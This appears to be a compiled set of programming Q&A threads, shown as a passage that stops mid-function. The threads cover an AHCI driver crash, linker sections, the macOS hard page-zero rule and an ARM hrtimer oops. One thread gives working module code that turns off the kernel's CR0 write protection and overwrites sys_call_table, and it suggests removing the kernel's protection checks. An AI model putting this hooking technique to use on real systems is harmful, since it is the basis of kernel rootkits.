I'm referencing this answer on crash analysis to help analyze a bit of code which caused problems. For context: I'm working on a character driver which will act as a pass-through from user space directly to the hardware, for the ahci driver. I'm modifying the ahci driver accordingly for this purpose.
I'm starting small. I want to peek at the port registers for the HBA port 0 of the AHCI HBA on my VM. My character driver ioctl code:
switch (cmd) {
case AHCIP_GPORT_REG:
pPciDev = pci_get_device(0x8086, 0x2829, NULL);
if (pPciDev) {
/* This will set ret to the value that it needs to be. This
* is true of __put_user() too */
if ((ret = __get_user(off, (u32*)obj))) {
printk(KERN_INFO "unable to read from user space\n");
goto ioctl_quick_out;
}
reg = get_port_reg(&pPciDev->dev, off);
if ((ret = __put_user(reg, (u32*)obj)))
{
printk(KERN_INFO "Unable to write to user space\n");
}
pci_dev_put(pPciDev);
}
// This break wasn't in the code when it crashed
break;
default:
// POSIX compliance with this one (REF of LDD3)
ret = -ENOTTY;
}
The code from my modified version of ahci.c which this character driver calls into:
/*
 * Read one 32-bit AHCI port register.
 *
 * dev: device that is converted to a Scsi_Host, then to an ata_port.
 * off: byte offset added to the port's MMIO base before the read.
 *
 * Returns the value read with ioread32().
 *
 * NOTE(review): the ioctl caller shown above passes &pPciDev->dev here.
 * class_to_shost() presumably expects the device embedded in a Scsi_Host,
 * not the PCI device's struct device -- confirm; the reported oops is at
 * the second load in this function.
 */
u32 get_port_reg(struct device *dev, u32 off)
{
struct Scsi_Host *shost = class_to_shost(dev);
struct ata_port *ap = ata_shost_to_port(shost);
void __iomem *port_mmio = ahci_port_base(ap);
return ioread32(port_mmio + off);
}
EXPORT_SYMBOL(get_port_reg);
The kernel oops that this caused, happened here:
PID: 3357 TASK: ffff88011c9b7500 CPU: 0 COMMAND: "peek"
#0 [ffff8800abfc79f0] machine_kexec at ffffffff8103b5bb
#1 [ffff8800abfc7a50] crash_kexec at ffffffff810c9852
#2 [ffff8800abfc7b20] oops_end at ffffffff8152e0f0
#3 [ffff8800abfc7b50] no_context at ffffffff8104c80b
#4 [ffff8800abfc7ba0] __bad_area_nosemaphore at ffffffff8104ca95
#5 [ffff8800abfc7bf0] bad_area at ffffffff8104cbbe
#6 [ffff8800abfc7c20] __do_page_fault at ffffffff8104d36f
#7 [ffff8800abfc7d40] do_page_fault at ffffffff8153003e
#8 [ffff8800abfc7d70] page_fault at ffffffff8152d3f5
[exception RIP: get_port_reg+18]
RIP: ffffffffa03c4cd2 RSP: ffff8800abfc7e28 RFLAGS: 00010246
RAX: 0000000000020101 RBX: 00007fff17273960 RCX: ffffffff812b0710
RDX: ffff88011ddd5000 RSI: 0000000000000000 RDI: ffff88011ddd5090
RBP: ffff8800abfc7e28 R8: 0000000000000000 R9: 0000000000000000
R10: 00000000000007d5 R11: 0000000000000006 R12: ffff88011ddd5000
R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000
ORIG_RAX: ffffffffffffffff CS: 0010 SS: 0018
As you can see, the instruction pointer was get_port_reg+18. Since this function is quite small, here's the full disassembly
crash> dis get_port_reg
0xffffffffa03c4cc0 <get_port_reg>: push %rbp
0xffffffffa03c4cc1 <get_port_reg+1>: mov %rsp,%rbp
0xffffffffa03c4cc4 <get_port_reg+4>: nopl 0x0(%rax,%rax,1)
0xffffffffa03c4cc9 <get_port_reg+9>: mov 0x240(%rdi),%rax
0xffffffffa03c4cd0 <get_port_reg+16>: mov %esi,%esi
0xffffffffa03c4cd2 <get_port_reg+18>: mov 0x2838(%rax),%rdx
0xffffffffa03c4cd9 <get_port_reg+25>: mov 0x28(%rax),%eax
0xffffffffa03c4cdc <get_port_reg+28>: mov 0x10(%rdx),%rdx
0xffffffffa03c4ce0 <get_port_reg+32>: shl $0x7,%eax
0xffffffffa03c4ce3 <get_port_reg+35>: mov %eax,%eax
0xffffffffa03c4ce5 <get_port_reg+37>: add 0x28(%rdx),%rax
0xffffffffa03c4ce9 <get_port_reg+41>: lea 0x100(%rax,%rsi,1),%rdi
0xffffffffa03c4cf1 <get_port_reg+49>: callq 0xffffffff8129dde0 <ioread32>
0xffffffffa03c4cf6 <get_port_reg+54>: leaveq
0xffffffffa03c4cf7 <get_port_reg+55>: retq
0xffffffffa03c4cf8 <get_port_reg+56>: nopl 0x0(%rax,%rax,1)
As you might have guessed, I'm something of an assembly neophyte. Which line of code would be get_port_reg+18? I'm puzzled because I'm calling functions on each line of that function but the only call I see is to ioread32().
For reference, I've modeled my function get_port_reg after ahci_show_port_cmd() within the same file. I could not think of any other means of getting the struct pci_dev structure necessary on which this is to operate. Am I making bad use of pci_get_device() and pci_dev_put()? Is this not the issue at all?
Thanks for any help
Andy
I am going to post my own answer. The two commenters on my question have put me onto the correct path for fixing this. As I mentioned, my approach was to do something which I'd seen done elsewhere in the ahci driver (ahci.c). Basically, the assumption was simple: this function in ahci.c required a struct device* and from that was able to get the ata_port information that was required. I'd seen, in ahci.c, that the author had occasionally done struct device *dev = &pdev->dev;. In other words, I figured that the dev member of struct pci_dev was getting me what I needed. I was apparently unaware of "class types" or something similar (see @myaut's first comment). @alexhoppus essentially draws the same/similar conclusion based on the code and disassembly which I posted.
The fix which I have employed, and which does work nicely, is as follows:
/* ioctl code in character driver */
switch (cmd) {
case AHCIP_GPORT_REG:
pPciDev = pci_get_device(0x8086, 0x2829, NULL);
if (pPciDev) {
struct ata_host *pHost = NULL;
struct ata_port *pPort = NULL;
printk(KERN_INFO "found the PCI device\n");
/* Get the devices driver data */
pHost = pci_get_drvdata(pPciDev);
if (!pHost) {
ret = -EFAULT;
goto ioctl_valid_pci_dev_out;
}
/* for this test, we'll use just port 0 */
pPort = pHost->ports[0];
if (!pPort) {
ret = -EFAULT;
goto ioctl_valid_pci_dev_out;
}
/* This will set ret to the value that it needs to be. This
* is true of __put_user() too */
if ((ret = __get_user(off, (u32*)obj))) {
printk(KERN_INFO "unable to read from user space\n");
goto ioctl_valid_pci_dev_out;
}
reg = get_port_reg(pPort, off);
if ((ret = __put_user(reg, (u32*)obj)))
{
printk(KERN_INFO "Unable to write to user space\n");
}
}
break;
default:
// POSIX compliance with this one (REF of LDD3)
ret = -ENOTTY;
}
The ahci driver was modified thusly as well
/*
 * get_port_reg - read a 32-bit register of an AHCI port.
 * @pPort: port whose MMIO base (as returned by ahci_port_base()) is used
 * @off:   byte offset added to that base
 *
 * Returns the value obtained from ioread32() at base + off.
 */
u32 get_port_reg(struct ata_port* pPort, u32 off)
{
	return ioread32(ahci_port_base(pPort) + off);
}
EXPORT_SYMBOL(get_port_reg);
Though this has fixed the issue for me, I would really appreciate someone explaining to me what is placed in (struct pci_dev)device.dev.p->driver_data. I can use, and have used, the Linux cross-referencing tools to see the data types. What is supposed to be stored in `struct device_private`? This is the structure which I'm now using to get the data I need. I'd truly appreciate someone commenting on this answer to explain that one.
Thanks to @myaut and @alexhoppus
Related
I am trying to add a syscall in a module. My rationale is:
This is for a research project, so the exact implementation does not matter.
Adding syscalls in the kernel-core takes a prohibitively long time to re-compile. I can suck up compiling once with an expanded syscall table, but not every time. Even with incremental compiling, linking and archiving the final binary takes a long time.
Since the project is timing sensitive, using kprobes to intercept the syscall handler would slow down the syscall handler.
I am still open to other means of adding a syscall, but for the above reasons, I think that writing to the sys_call_table in a module is the cleanest way to do what I am trying to do.
I've gotten the address of the syscall table from the System.map, disabled kaslr, and I am trying to clear the page protections, but some write-protection is still holding me back.
// following https://web.iiit.ac.in/~arjun.nath/random_notes/modifying_sys_call.html
// clear cr0 write protection
write_cr0 (read_cr0 () & (~ 0x10000));
// clear page write protection
sys_call_table_page = virt_to_page(&sys_call_table[__NR_execves]);
set_pages_rw(sys_call_table_page, 1);
// do write
sys_call_table[__NR_execves] = sys_execves;
However, I'm still getting a permission error, but I don't know the mechanism by which it is enforced:
[ 11.145647] ------------[ cut here ]------------
[ 11.148893] CR0 WP bit went missing!?
[ 11.151539] WARNING: CPU: 0 PID: 749 at arch/x86/kernel/cpu/common.c:386 native_write_cr0+0x3e/0x70
...
Here was a call trace pointing to the write of sys_call_table
...
[ 11.332825] ---[ end trace c20c95651874c08b ]---
[ 11.336056] CPA protect Rodata RO: 0xffff888002804000 - 0xffff888002804fff PFN 2804 req 8000000000000063 prevent 0000000000000002
[ 11.343934] CPA protect Rodata RO: 0xffffffff82804000 - 0xffffffff82804fff PFN 2804 req 8000000000000163 prevent 0000000000000002
[ 11.351720] BUG: unable to handle page fault for address: ffffffff828040e0
[ 11.356418] #PF: supervisor write access in kernel mode
[ 11.359908] #PF: error_code(0x0003) - permissions violation
[ 11.363665] PGD 3010067 P4D 3010067 PUD 3011063 PMD 31e29063 PTE 8000000002804161
[ 11.368701] Oops: 0003 [#1] SMP KASAN PTI
full dmesg
Any guesses on how to disable it?
There is a way that does not need to recompile the kernel. Since the kernel will detect whether the wp bit has been modified in write_cr0, you can provide a custom function to bypass it.
/*
 * Load `cr0` into the CR0 control register with a raw `mov` instruction.
 * This is used instead of the kernel's write_cr0() so that the kernel's
 * check for a modified WP bit in write_cr0() is not run.
 * NOTE(review): __force_order is listed as an in/out memory operand,
 * presumably to order this asm against other CR accesses -- confirm.
 */
inline void mywrite_cr0(unsigned long cr0) {
asm volatile("mov %0,%%cr0" : "+r"(cr0), "+m"(__force_order));
}
Here is the function that enables/disables write protection. We use
mywrite_cr0 instead of write_cr0
/*
 * Re-enable write protection: read CR0, set bit 16 (the write-protect
 * bit, mask 0x10000) and write the result back through mywrite_cr0().
 */
void enable_write_protection(void) {
	mywrite_cr0(read_cr0() | (1UL << 16));
}
/*
 * Disable write protection: read CR0, clear bit 16 (the write-protect
 * bit, mask 0x10000) and write the result back through mywrite_cr0().
 */
void disable_write_protection(void) {
	mywrite_cr0(read_cr0() & ~(1UL << 16));
}
In your mod_init function, you can use kallsyms_lookup_name("sys_call_table") to figure out the address of sys_call_table at runtime, instead of compile time. Fortunately, we can now directly write to sys_call_table without dealing with pageattr.
The code below is tested on Linux Kernel 5.1.4
/*
 * Load `cr0` into the CR0 control register with a raw `mov` instruction,
 * used here in place of the kernel's write_cr0().
 * NOTE(review): __force_order is listed as an in/out memory operand,
 * presumably to order this asm against other CR accesses -- confirm.
 */
inline void mywrite_cr0(unsigned long cr0) {
asm volatile("mov %0,%%cr0" : "+r"(cr0), "+m"(__force_order));
}
/*
 * Re-enable write protection: read CR0, set bit 16 (the write-protect
 * bit, mask 0x10000) and write the result back through mywrite_cr0().
 */
void enable_write_protection(void) {
	mywrite_cr0(read_cr0() | (1UL << 16));
}
/*
 * Disable write protection: read CR0, clear bit 16 (the write-protect
 * bit, mask 0x10000) and write the result back through mywrite_cr0().
 */
void disable_write_protection(void) {
	mywrite_cr0(read_cr0() & ~(1UL << 16));
}
/* State kept between module load and unload for the syscall hook. */
static struct {
/* Address of the syscall table, looked up by name in mod_init(). */
void **sys_call_table;
/* Original table entry saved in mod_init() and restored in mod_cleanup(). */
void *orig_fn;
} tinfo;
/*
 * Module entry point: locate sys_call_table by name, remember the original
 * handler for your_syscall_num, and replace it with sys_yourcall.
 *
 * Returns 0 on success, or -ENOENT when the sys_call_table symbol cannot
 * be resolved (in which case nothing is modified).
 */
static int __init mod_init(void) {
	printk(KERN_INFO "Init syscall hook\n");

	tinfo.sys_call_table = (void **)kallsyms_lookup_name("sys_call_table");
	/* A failed lookup yields 0; indexing it would fault in module init. */
	if (!tinfo.sys_call_table) {
		printk(KERN_ERR "sys_call_table symbol not found\n");
		return -ENOENT;
	}

	/* Save the original entry so mod_cleanup() can put it back. */
	tinfo.orig_fn = tinfo.sys_call_table[your_syscall_num];

	disable_write_protection();
	// modify sys_call_table directly
	tinfo.sys_call_table[your_syscall_num] = sys_yourcall;
	enable_write_protection();
	return 0;
}
/*
 * Module exit point: write the handler saved in tinfo.orig_fn back into
 * the syscall table slot, with write protection lifted only around the
 * store.
 */
static void __exit mod_cleanup(void) {
	void **table = tinfo.sys_call_table;

	printk(KERN_INFO "Cleaning up syscall hook.\n");

	/* restore the original syscall entry */
	disable_write_protection();
	table[your_syscall_num] = tinfo.orig_fn;
	enable_write_protection();

	printk(KERN_INFO "Cleaned up syscall hook.\n");
}
module_init(mod_init);
module_exit(mod_cleanup);
The kernel has code to protect against this sort of action.
First, the kernel by default does not allow you to remove write protection from the cr0 register. It checks that in arch/x86/kernel/cpu/common.c:native_write_cr0
if (static_branch_likely(&cr_pinning)) {
if (unlikely((val & X86_CR0_WP) != X86_CR0_WP)) {
bits_missing = X86_CR0_WP;
val |= bits_missing;
goto set_register;
}
/* Warn after we've set the missing bits. */
WARN_ONCE(bits_missing, "CR0 WP bit went missing!?\n");
}
Second, the page table does not allow you to set a page that should be read-only to read-write. It does that check arch/x86/mm/pageattr.c:static_protections
/* Check the PFN directly */
res = protect_rodata(pfn, pfn + npg - 1);
check_conflict(warnlvl, prot, res, start, end, pfn, "Rodata RO");
forbidden |= res;
If you disable these two checks by removing both blobs, the code to change the pagetable works.
It is possible to just remap the sys_call_table as read-write using the set_memory_rw function, so it's possible to write to it without disabling write protection for the whole kernel. Used this method myself on aarch64, not sure if it works on x86.
I want to put some functions in a specific section named ".xip.text",
but their read-only data is not placed in that section.
The following is my test code:
#include <stdio.h>
/* foo() is emitted into the ".xip.text" section rather than the default one. */
__attribute__((section (".xip.text")))
void foo(void)
{
	printf("hello world\n");
}
In the linker script file:
/* Two memory regions: RAM (read/write/execute) and FLASH (read/execute). */
MEMORY
{
RAM (rwx) : ORIGIN = 0x00010000, LENGTH = 448K
FLASH (rx) : ORIGIN = 0x10000000, LENGTH = 1024K
}
SECTIONS
{
/* Output section .xip: gathers .xip.text* and .xip.rodata* input sections into FLASH. */
.xip :
{
*(.xip.text .xip.text.*)
*(.xip.rodata .xip.rodata.*)
} > FLASH
/* All remaining .text* input sections are placed in RAM. */
.text :
{
*(.text*)
} > RAM
}
After linking, the function text is placed in ".xip" section, but the string
"hello world\n" is not put in the same section. How to solve it?
I can put the whole file in the ".xip" section to solve this problem. But I
have many files, and I only want to put some functions to ".xip" section, not
the whole file.
In the map file, text of foo() is placed in the right section,
but the string "hello world\n" (.rodata.str1.1) is placed in another section.
*(.xip.text .xip.text.*)
.xip.text 0x1002f7b0 0xc ../foo.o
0x1002f7b0 foo
*fill* 0x1002f7bc 0x4
.rodata.str1.1
0x00025515 0xc ../foo.o
*fill* 0x00025521 0x3
After disassemble,
1002f7b0 <foo>:
void foo(void) __attribute__((section (".xip.text")));
void foo(void)
{
printf("hello world\n");
1002f7b0: 4801 ldr r0, [pc, #4] ; (1002f7b8 <foo+0x8>)
1002f7b2: f000 b95d b.w 1002fa70 <__puts_veneer>
1002f7b6: bf00 nop
1002f7b8: 00025515 .word 0x00025515
1002f7bc: 00000000 .word 0x00000000
gcc version: gcc-arm-none-eabi-7-2017-q4-major, gcc version 7.2.1 20170904 (release) [ARM/embedded-7-branch revision 255204] (GNU Tools for Arm Embedded Processors 7-2017-q4-major)
function text is placed in ".xip" section, but the string "hello world\n" is not put in the same section.
The read-only data is not .text, so it shouldn't be put into the same section.
If you want to control which section the read-only data goes, you need to do that yourself. Something like this should work:
/*
 * The message lives in a named array so that it can be placed explicitly
 * in the ".xip.rodata" section instead of the compiler-chosen string
 * section.
 */
__attribute__((section(".xip.rodata")))
const char my_xip_data[] = "hello, world\n";

/*
 * Print the message. fputs() is used rather than printf(my_xip_data) so
 * the data is never interpreted as a format string, and no additional
 * string literal (such as "%s") is introduced outside ".xip.rodata".
 */
void foo(void)
{
	fputs(my_xip_data, stdout);
}
For over a year now, I've been using XCode 4.5 to build an app using the OS X 10.7 sdk, with target deployment to 10.6.
The app runs perfectly well on 10.6, 10.7, 10.8, and 10.9. But when I run it on 10.10, I get a message in the Console saying "Cannot enforce a hard page-zero" for the app.
Googling "Cannot enforce a hard page-zero" returns nothing helpful.
Does anyone have any idea what this means?
One useful bit of information is that building the app with XCode 5 doesn't result in the problem, so I'm thinking it has something to do with the older XCode 4.5.
I'd rather stick with the older XCode if it's a simple fix, since I'm hesitant to move to XCode 5 if I don't have to.
Any insights very much appreciated.
EDIT 1: I discovered that opening the app in 32-bit mode works on Yosemite. So it's only 64-bit mode that has the problem.
EDIT 2: here is the output of otool as requested by Ken:
Load command 0
cmd LC_SEGMENT_64
cmdsize 72
segname __TEXT
vmaddr 0x00000001007f9000
vmsize 0x0000000000225dba
fileoff 0
filesize 2251422
maxprot rwx
initprot rwx
nsects 0
flags (none)
Load command 1
cmd LC_UNIXTHREAD
cmdsize 184
flavor x86_THREAD_STATE64
count x86_THREAD_STATE64_COUNT
rax 0x0000000000000000 rbx 0x0000000000000000 rcx 0x0000000000000000
rdx 0x0000000000000000 rdi 0x0000000000000000 rsi 0x0000000000000000
rbp 0x0000000000000000 rsp 0x0000000000000000 r8 0x0000000000000000
r9 0x0000000000000000 r10 0x0000000000000000 r11 0x0000000000000000
r12 0x0000000000000000 r13 0x0000000000000000 r14 0x0000000000000000
r15 0x0000000000000000 rip 0x0000000100a1e3d8
rflags 0x0000000000000000 cs 0x0000000000000000 fs 0x0000000000000000
gs 0x0000000000000000
Apple's kernel (xnu) from OS X 10.10 now enforces a 'hard page-zero' where in past this was not the case. Note this requirement is only for 64 bit MachO executables.
The issue would be resolved for your application by ensuring there is a __PAGEZERO segment. Importantly, this __PAGEZERO segment must have a vmaddr of 0x0 (NULL) and a vmsize of at least 0x1000. The specific name '__PAGEZERO' for the segment is not actually required, but most compilers will use it in this manner.
A hard (limited privileges) PAGEZERO makes NULL dereference software vulnerabilities harder to exploit.
The following code snippets from the xnu source code explains:
// From xnu-2782.1.97/bsd/kern/mach_loader.c
load_return_t
load_machfile(
struct image_params *imgp,
struct mach_header *header,
thread_t thread,
vm_map_t new_map,
load_result_t *result
)
{
...
boolean_t enforce_hard_pagezero = TRUE;
...
// Second vm_map_create() argument sets map->min_offset to zero.
map = vm_map_create(pmap,
0,
vm_compute_max_offset((imgp->ip_flags & IMGPF_IS_64BIT)),
TRUE);
...
#if __x86_64__
/*
* On x86, for compatibility, don't enforce the hard page-zero restriction for 32-bit binaries.
*/
if ((imgp->ip_flags & IMGPF_IS_64BIT) == 0) {
enforce_hard_pagezero = FALSE;
}
#endif
/*
* Check to see if the page zero is enforced by the map->min_offset.
*/
// Note: vm_map_has_hard_pagezero(map, 0x1000) checks if map->min_offset >= 0x1000
// Refer xnu-2782.1.97/osfmk/vm/vm_map.c
if (enforce_hard_pagezero && (vm_map_has_hard_pagezero(map, 0x1000) == FALSE)) {
if (create_map) {
vm_map_deallocate(map); /* will lose pmap reference too */
}
printf("Cannot enforce a hard page-zero for %s\n", imgp->ip_strings);
return (LOAD_BADMACHO);
}
The raising of map->min_offset above zero happens in the segment loading code:
// From xnu-2782.1.97/bsd/kern/mach_loader.c
static
load_return_t
load_segment(
struct load_command *lcp,
uint32_t filetype,
void * control,
off_t pager_offset,
off_t macho_size,
struct vnode *vp,
vm_map_t map,
int64_t slide,
load_result_t *result
)
{
...
/*
* Round sizes to page size.
*/
seg_size = round_page_64(scp->vmsize);
map_size = round_page_64(scp->filesize);
map_addr = trunc_page_64(scp->vmaddr); /* JVXXX note that in XNU TOT this is round instead of trunc for 64 bits */
seg_size = vm_map_round_page(seg_size, vm_map_page_mask(map));
map_size = vm_map_round_page(map_size, vm_map_page_mask(map));
...
// This if test is key, checking for a 0x0 vmaddr, vmsize, and initprot and maxprot
// memory protections.
// Note a segment name of "__PAGEZERO" is not actually required.
if (map_addr == 0 &&
map_size == 0 &&
seg_size != 0 &&
(scp->initprot & VM_PROT_ALL) == VM_PROT_NONE &&
(scp->maxprot & VM_PROT_ALL) == VM_PROT_NONE) {
/*
* For PIE, extend page zero rather than moving it. Extending
* page zero keeps early allocations from falling predictably
* between the end of page zero and the beginning of the first
* slid segment.
*/
seg_size += slide;
slide = 0;
/*
* This is a "page zero" segment: it starts at address 0,
* is not mapped from the binary file and is not accessible.
* User-space should never be able to access that memory, so
* make it completely off limits by raising the VM map's
* minimum offset.
*/
ret = vm_map_raise_min_offset(map, seg_size);
// From xnu-2782.1.97/osfmk/vm/vm_map.c
/*
* Raise a VM map's minimum offset.
* To strictly enforce "page zero" reservation.
*/
kern_return_t
vm_map_raise_min_offset(
vm_map_t map,
vm_map_offset_t new_min_offset)
{
...
}
As to why your older Xcode 4.x does not set this up, it seems quite odd -- perhaps there is a project file setting, but the version of the clang compiler and linker which come with newer Xcode 5 (nay even Xcode 6) should more closely reflect the requirements of the modern OS X 10.10 kernel.
Note: There was a form of hard page-zero enforcement in earlier iOS releases, but not previously in OS X.
Valgrind, the tool suite which provides a number of debugging and profiling tools that help you make your programs faster and more correct, is also experiencing a related issue with this new OS X 10.10 kernel requirement: https://bugs.kde.org/show_bug.cgi?id=339045
I have encountered a very similar problem. otool -lV shows a similar segment structure. What I found out was that the issue was actually caused by executable packing using UPX (3.08). If you have applied UPX to your binary, run upx -d to decompress the binary and try running it on Yosemite again. The related discussions for my issue was described in a bug report I just filed:
https://sourceforge.net/p/upx/bugs/238/
Please help me solve this Oops. I use a 1 millisecond high-resolution timer, installed as a separate module with "insmod". It fires every 1 ms and I have to do some task in this timer interrupt. There are other processes which do image transfer, and I see the ethernet driver interrupt appearing in order to send the image. This ethernet interrupt has a higher priority and looks like it is delaying the 1 ms timer interrupt above, but I am not sure.
I see the below Oops after running test for 3 to 3 hours. How to root cause this ?
please help.
The system is ARM omap, running Linux 2.6.33 cross compiled.
[root#user:/]#
Unable to handle kernel paging request at virtual address 7eb52754
pgd = 80004000
[7eb52754] *pgd=00000000
Internal error: Oops: 80000005 [#1] PREEMPT
last sysfs file: /sys/devices/virtual/spi/spi/dev
Modules linked in: mod timermod mod2(P) mod3(P) mod4
CPU: 0 Tainted: P (2.6.33_appl #1)
PC is at 0x7eb52754
LR is at walk_stackframe+0x24/0x40
pc : [<7eb52754>] lr : [<8002d4dc>] psr: a0000013
sp : 80395f10 ip : 80395f30 fp : 80395f2c
r10: 0000001f r9 : 00000000 r8 : 87a25200
r7 : 878b0380 r6 : 80395f40 r5 : 80028374 r4 : 80395f30
r3 : 80000100 r2 : 80395f40 r1 : 80395f40 r0 : 80395f30
Flags: NzCv IRQs on FIQs on Mode SVC_32 ISA ARM Segment kernel
Control: 10c5387d Table: 86fb0019 DAC: 00000017
Process swapper (pid: 0, stack limit = 0x803942e8)
Stack: (0x80395f10 to 0x80396000)
5f00: 8002bfa4 00000001 802c678c 87a25380
5f20: 80395f54 80395f30 8002bfe0 8002d4c4 80395f54 80395f30 8004998c 8002bfa4
5f40: 00000002 00000002 80395f6c 80395f58 8004998c 8002bfb0 80396ea8 80394000
5f60: 80395fa4 80395f70 802c678c 800498d0 8002b320 80023218 80398408 80021e10
5f80: 80394000 8002321c 80023218 80398408 80021e10 413fc082 80395fbc 80395fa8
5fa0: 8002b324 802c62fc 803f4cc8 803f5190 80395fcc 80395fc0 802c3ee4 8002b28c
5fc0: 80395ff4 80395fd0 8000897c 802c3e6c 800084fc 00000000 00000000 8002321c
5fe0: 10c53c7d 803c7630 00000000 80395ff8 80008034 80008754 00000000 00000000
Backtrace:
[<8002d4b8>] (walk_stackframe+0x0/0x40) from [<8002bfe0>] (return_address+0x3c/0x5c)
r6:87a25380 r5:802c678c r4:00000001 r3:8002bfa4
[<8002bfa4>] (return_address+0x0/0x5c) from [<8004998c>] (sub_preempt_count+0xc8/0xfc)
[<800498c4>] (sub_preempt_count+0x0/0xfc) from [<802c678c>] (schedule+0x49c/0x4d8)
r5:80394000 r4:80396ea8
[<802c62f0>] (schedule+0x0/0x4d8) from [<8002b324>] (cpu_idle+0xa4/0xbc)
r9:413fc082 r8:80021e10 r7:80398408 r6:80023218 r5:8002321c
r4:80394000
[<8002b280>] (cpu_idle+0x0/0xbc) from [<802c3ee4>] (rest_init+0x84/0xa0)
r4:803f5190 r3:803f4cc8
[<802c3e60>] (rest_init+0x0/0xa0) from [<8000897c>] (start_kernel+0x234/0x284)
[<80008748>] (start_kernel+0x0/0x284) from [<80008034>] (__enable_mmu+0x0/0x2c)
Code: bad PC value
---[ end trace 7e26218fd59f68a5 ]---
Kernel panic - not syncing: Attempted to kill the idle task!
Backtrace:
[<8002db2c>] (dump_backtrace+0x0/0x114) from [<802c610c>] (dump_stack+0x20/0x24)
r6:fffffffc r5:0000000b r4:803c8518 r3:00000002
[<802c60ec>] (dump_stack+0x0/0x24) from [<802c6168>] (panic+0x58/0x130)
[<802c6110>] (panic+0x0/0x130) from [<80057330>] (do_exit+0x7c/0x6e0)
r3:80394000 r2:00000000 r1:80395d28 r0:80348e90
[<800572b4>] (do_exit+0x0/0x6e0) from [<8002dfc0>] (die+0x290/0x2c4)
r7:7eb52744
[<8002dd30>] (die+0x0/0x2c4) from [<8002f4d4>] (__do_kernel_fault+0x74/0x84)
r7:80395ec8
[<8002f460>] (__do_kernel_fault+0x0/0x84) from [<8002f6bc>] (do_page_fault+0x1d8/0x1f0)
r7:00000000 r6:80395ec8 r5:7eb52754 r4:80396ea8
[<8002f4e4>] (do_page_fault+0x0/0x1f0) from [<8002f794>] (do_translation_fault+0x20/0x80)
[<8002f774>] (do_translation_fault+0x0/0x80) from [<80029250>] (do_PrefetchAbort+0x44/0xa8)
r6:7eb52754 r5:80398820 r4:00000005 r3:8002f774
[<8002920c>] (do_PrefetchAbort+0x0/0xa8) from [<80029d1c>] (__pabt_svc+0x5c/0xa0)
Exception stack(0x80395ec8 to 0x80395f10)
5ec0: 80395f30 80395f40 80395f40 80000100 80395f30 80028374
5ee0: 80395f40 878b0380 87a25200 00000000 0000001f 80395f2c 80395f30 80395f10
5f00: 8002d4dc 7eb52754 a0000013 ffffffff
r7:878b0380 r6:80395f40 r5:80395efc r4:ffffffff
[<8002d4b8>] (walk_stackframe+0x0/0x40) from [<8002bfe0>] (return_address+0x3c/0x5c)
r6:87a25380 r5:802c678c r4:00000001 r3:8002bfa4
[<8002bfa4>] (return_address+0x0/0x5c) from [<8004998c>] (sub_preempt_count+0xc8/0xfc)
[<800498c4>] (sub_preempt_count+0x0/0xfc) from [<802c678c>] (schedule+0x49c/0x4d8)
r5:80394000 r4:80396ea8
[<802c62f0>] (schedule+0x0/0x4d8) from [<8002b324>] (cpu_idle+0xa4/0xbc)
r9:413fc082 r8:80021e10 r7:80398408 r6:80023218 r5:8002321c
r4:80394000
[<8002b280>] (cpu_idle+0x0/0xbc) from [<802c3ee4>] (rest_init+0x84/0xa0)
r4:803f5190 r3:803f4cc8
[<802c3e60>] (rest_init+0x0/0xa0) from [<8000897c>] (start_kernel+0x234/0x284)
[<80008748>] (start_kernel+0x0/0x284) from [<80008034>] (__enable_mmu+0x0/0x2c)
=========================================
#include <linux/hrtimer.h>
#include <linux/module.h>
#include <linux/ktime.h>
#include <linux/kdev_t.h>
#include <linux/cdev.h>
#include <linux/device.h>
#include <linux/fs.h>
#include <linux/wait.h>
#include <linux/sched.h>
#define FIRST_MINOR 0
#define MINOR_CNT 1
static struct class *cl;
static struct cdev cdev;
static dev_t dev;
static u8 timer_expired = 0;
static wait_queue_head_t wq_head;
static struct hrtimer timer;
/*
 * read() handler: block the caller until timer_callback() has flagged an
 * expiry, then clear the flag. No data is copied to @buff.
 *
 * Returns 0 after an expiry, or the non-zero value returned by
 * wait_event_interruptible() when the sleep was interrupted, so that an
 * interrupted wait is not reported to user space as a timer tick.
 */
static ssize_t hr_read(struct file *f, char * __user buff, size_t cnt, loff_t *off)
{
	int err;

	err = wait_event_interruptible(wq_head, timer_expired);
	if (err)
		return err;

	timer_expired = 0;
	return 0;
}
static int hr_open(struct inode *i, struct file *f)
{
ktime_t ktime;
ktime.tv64 = 1E6L;
hrtimer_start(&timer, ktime, HRTIMER_MODE_REL);
return 0;
}
/*
 * release() handler: cancel the timer and log a message when
 * hrtimer_cancel() reports a non-zero result. Always returns 0.
 */
static int hr_close(struct inode *i, struct file *f)
{
	int was_cancelled = hrtimer_cancel(&timer);

	if (was_cancelled != 0)
		printk(KERN_INFO "timercancelled\n");

	return 0;
}
static struct file_operations hr_fops = {
.read = hr_read,
.open = hr_open,
.release = hr_close
};
static enum hrtimer_restart timer_callback(struct hrtimer *timer)
{
ktime_t ktime;
u64 overrun;
ktime.tv64 = 1E6L;
//printk("KERN_INFO""Timer Expired");
overrun = hrtimer_forward_now(timer, ktime);
timer_expired = 1;
wake_up_interruptible(&wq_head);
return HRTIMER_RESTART;
}
#if 1
/*
 * Module init: prepare the wait queue and the hrtimer, then register the
 * character device (region, cdev, class, device node "hrt0").
 *
 * Returns 0 on success or the negative errno of the step that failed;
 * everything registered before the failure is undone.
 */
static int init_hrtimer(void)
{
	unsigned long delay_in_ms = 500L;
	struct device *hrt_dev;
	int err;

	printk(KERN_ERR "Timer being set up\n");

	/*
	 * The wait queue and timer must be usable before cdev_add() makes
	 * the device live, because open()/read() touch both.
	 */
	init_waitqueue_head(&wq_head);
	hrtimer_init(&timer, CLOCK_MONOTONIC, HRTIMER_MODE_REL);
	timer.function = &timer_callback;

	printk(KERN_ERR "Timer starting to fire\n");
	printk(KERN_ERR "in %ldms %ld\n", delay_in_ms, jiffies);

	err = alloc_chrdev_region(&dev, FIRST_MINOR, MINOR_CNT, "Hr Timer");
	if (err < 0)
		return err;
	printk("Major Nr: %d\n", MAJOR(dev));

	cdev_init(&cdev, &hr_fops);
	/* cdev_add() reports failure as a negative errno, not only -1. */
	err = cdev_add(&cdev, dev, MINOR_CNT);
	if (err < 0)
		goto err_region;

	/* class_create() reports failure through an ERR_PTR, never NULL. */
	cl = class_create(THIS_MODULE, "hrtimer");
	if (IS_ERR(cl)) {
		err = PTR_ERR(cl);
		goto err_cdev;
	}

	hrt_dev = device_create(cl, NULL, dev, NULL, "hrt%d", 0);
	if (IS_ERR(hrt_dev)) {
		err = PTR_ERR(hrt_dev);
		goto err_class;
	}

	return 0;

err_class:
